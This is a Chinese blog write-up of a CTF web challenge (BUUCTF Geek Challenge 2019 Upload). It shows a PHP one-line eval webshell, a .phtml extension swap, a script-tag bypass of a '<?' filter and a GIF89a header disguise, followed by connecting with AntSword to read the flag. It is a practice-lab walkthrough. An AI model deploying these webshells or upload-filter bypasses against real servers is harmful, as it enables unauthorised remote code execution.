BUUCTF WEB [极客大挑战 2019]Upload

本文详细记录了一次Web安全挑战中针对PHP文件上传漏洞的利用过程。通过尝试不同的文件内容和后缀,最终成功上传了一个.phtml文件并伪装成图片。利用蚁剑连接到服务器,找到了上传文件的路径并获取了flag。该过程涉及文件后缀修改、内容过滤绕过及文件头伪装等技巧。
摘要由CSDN通过智能技术生成

BUUCTF WEB [极客大挑战 2019]Upload


  • 尝试提交一句话木马shell.php

    <?php @eval($_POST['shell']);?>
    

    回显为

    NOT!php!
    

    说明需要修改文件后缀

  • 修改文件后缀为.phtml后尝试提交,回显为

    NO! HACKER! your file included '<?'
    

    说明不能包含<?,尝试绕过过滤

  • 将文件内容修改为

    <script language="php">eval($_POST['shell']);</script>
    

    回显为

    Don't lie to me, it's not image at all!!!
    

    说明会检查文件内容,尝试修改文件头

  • 将文件内容修改为

    GIF89a
    <script language="php">eval($_POST['shell']);</script>
    

    将其伪装成图片文件,回显为

    上传文件名: shell.phtml
    

    上传成功

  • 使用蚁剑连接,这里需要猜测上传文件路径,最后的路径为

    /upload/shell.phtml
    
  • 在文件根目录下找到flag

    flag{10b82eab-f326-4da4-9be7-eb3a6cc0378b}
    
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值